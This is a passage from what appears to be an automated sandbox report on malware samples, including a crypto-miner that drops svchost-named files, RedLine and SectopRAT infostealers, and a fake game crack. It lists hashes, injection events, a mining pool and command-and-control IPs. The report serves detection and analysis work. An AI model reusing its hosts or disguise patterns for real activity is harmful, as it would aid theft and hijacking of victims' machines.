US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
CA 51.79.71.77:14444 xmr-us-east1.nanopool.org tcp
US 8.8.8.8:53 77.71.79.51.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/4444-0-0x0000000074852000-0x0000000074853000-memory.dmp

memory/4444-1-0x0000000074850000-0x0000000074E01000-memory.dmp

memory/4444-2-0x0000000074850000-0x0000000074E01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe

MD5 56a7502c31f7e8b9df6026cca035d000
SHA1 a2e1dea33bec675650559a148f78f831a0c11886
SHA256 b6dffd0fcf337c0da1439857c9bb162c1965641e644163f702f29bc84fd04b9f
SHA512 82b2331d087d0543ef5004d59206f618db7ad91225b4720b302c7da2263972cadebc8412a3fa85262c993bfab5247cfa4cfea01d80ea4cbeb59c0ef7fbebe499

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe

MD5 164b5610097d3c76850d0d3cc1f3892a
SHA1 31c439c5dab3c0a98ca827a07e17f903b8aae2f9
SHA256 e922d71f77061f2ce7100d4f1aea67b8477d7e9cd9e40a10a411868cf93bbc52
SHA512 fa832118802c3b4107911a541e8498a6c3acd1fba50c3e0a115899d521a77e293325397296d00353abd6d10965dc74b8fea1ee58dafa6547f05c76bd6e64450e

memory/4444-26-0x0000000074850000-0x0000000074E01000-memory.dmp

memory/4992-27-0x00007FF8ABE33000-0x00007FF8ABE35000-memory.dmp

memory/4992-25-0x0000000000E30000-0x0000000000E40000-memory.dmp

memory/1964-32-0x000001E37E590000-0x000001E37E5B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1ub5fzm.2nw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb1ad317bd25b55b2bbdce8a28a74a94
SHA1 98a3978be4d10d62e7411946474579ee5bdc5ea6
SHA256 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512 d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 22310ad6749d8cc38284aa616efcd100
SHA1 440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA256 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA512 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

MD5 a5bdb33481f19152370a4cbe486c1790
SHA1 d657448275485590e0b141bc3965f03650636e47
SHA256 ead94cc9778691b1388fc31b4a9ec1bb1220073508e80228bd85d325612d7075
SHA512 61612206312611b2026e8a38a4b1f18a24fb8605e75bd2fe26d4132a6a4ab890e4096d8eb96e5f2cfc312885451f156ef6e56bd00943e1745ad532bbfef3d0fe

memory/1844-79-0x0000000000AD0000-0x0000000000ADE000-memory.dmp

memory/1844-80-0x0000000001490000-0x00000000014A2000-memory.dmp

memory/1844-81-0x0000000001D00000-0x0000000001D0A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e69c5554cfe965e000e33ee9f1cd88d5
SHA1 ef74e8e9a0113870c87ece51d4e86040b1eeecdc
SHA256 712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0
SHA512 6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cb0cf19ebeba3256a05065693a1ca866
SHA1 c028aff9b6850c2bdd6673b74037630b4ee2ccd8
SHA256 58e1183323526c135119df281171285d98b5ce05ad00f201ca899cd43358e3fb
SHA512 811606a0c8545eac53127a3687c6b0fde595dd7e958ef11ae650d142d40ac5e86ebbd313dc17dfa86c091ee868dc1c9ed422c2e541c6de3487e0c50c1a3e8fbc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 83685d101174171875b4a603a6c2a35c
SHA1 37be24f7c4525e17fa18dbd004186be3a9209017
SHA256 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

MD5 23867f73ff39fa0dfee6cfb5d3d176ab
SHA1 8705a09d38e5f0b034a6f4b4deb5817e312204e1
SHA256 f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88
SHA512 108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 0dc0c432c76b5f23dec8f2da05da574f
SHA1 f93bb2cd4e300c5b7808c8aeb3d80797975ccfb0
SHA256 9d4ed1c19be402033e56523eb9a78a928102c689c82e27ab926ea6f2206e8fee
SHA512 5cc10e825cc53878e89b44e9ae01973c194955364992cd769aaac49ecf5af392b01f051e2fe800c617a391555aa385ea56a2ae4d565287c1a5e42af93f1812e9

memory/3304-160-0x0000000000500000-0x0000000000506000-memory.dmp

memory/4880-162-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-163-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-164-0x0000013745870000-0x0000013745890000-memory.dmp

memory/4880-166-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-168-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-167-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-165-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-169-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-170-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-172-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-175-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4880-173-0x0000000140000000-0x0000000140786000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

146s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2496 set thread context of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe
PID 2496 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Installer2.exe C:\Users\Admin\AppData\Local\Temp\Installer2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

"C:\Users\Admin\AppData\Local\Temp\Installer2.exe"

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

C:\Users\Admin\AppData\Local\Temp\Installer2.exe

Network

Country Destination Domain Proto
NL 185.92.73.140:80 185.92.73.140 tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp
NL 185.92.73.140:443 N/A tcp

Files

memory/2496-0-0x00000000745EE000-0x00000000745EF000-memory.dmp

memory/2496-1-0x00000000013D0000-0x0000000001444000-memory.dmp

memory/2496-2-0x00000000745E0000-0x0000000074CCE000-memory.dmp

memory/2496-3-0x0000000000660000-0x0000000000682000-memory.dmp

memory/1588-4-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1588-9-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1588-6-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1588-10-0x00000000745E0000-0x0000000074CCE000-memory.dmp

memory/2496-11-0x00000000745E0000-0x0000000074CCE000-memory.dmp

memory/1588-12-0x00000000745E0000-0x0000000074CCE000-memory.dmp

memory/1588-13-0x00000000745E0000-0x0000000074CCE000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"

Signatures

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nixware crack.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\nixware crack.exe

"C:\Users\Admin\AppData\Local\Temp\nixware crack.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 105.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A